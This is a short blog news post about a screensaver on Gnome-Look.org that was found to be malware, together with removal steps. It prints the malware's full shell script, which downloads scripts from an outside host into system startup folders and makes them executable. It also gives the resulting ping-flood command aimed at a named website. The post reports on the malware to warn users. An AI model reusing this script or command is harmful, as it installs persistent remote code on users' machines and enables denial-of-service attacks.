Ubuntu: Malware in Screensaver from Gnome-Look.org

A desktop screensaver available from Gnome-Look.org was reported to be a malware, which downloads an unauthorized script. This script is believed to enable a possible DDoS attack.   The screensaver has been immediately removed from the website after the malware was confirmed at this thread at Ubuntu forums.

The malware posing as a screensaver has a script:

#!/bin/sh
cd /usr/bin/
rm Auto.bash
sleep 1
wget http://05748.t35.com/Bots/Auto.bash
chmod 777 Auto.bash
echo -----------------
cd /etc/profile.d/
rm gnome.sh
sleep 1
wget http://05748.t35.com/Bots/gnome.sh
chmod 777 gnome.sh
echo -----------------
clear
exit

The ultimate result of this command is:

ping -s 65507 www.mmowned.com

This seems harmless. Also, the site in question [ www.mmowned.com ] advertises protection against DOS attacks. This can be a good prank revenge on the company or, this can be a part of something big by making all these affected computers into bots.

If you have already installed the screensaver, remove it and protect your computer by issuing the commands:

sudo rm -f /usr/bin/Auto.bash /usr/bin/run.bash /etc/profile.d/gnome.sh index.php run.bash
and
sudo dpkg -r app5552

[ Via OMG! UBUNTU! ]

Published by

Chinmoy Kanjilal

Chinmoy Kanjilal is a FOSS enthusiast and evangelist. He is passionate about Android. Security exploits turn him on and he loves to tinker with computer networks. You can connect with him on Twitter @ckandroid.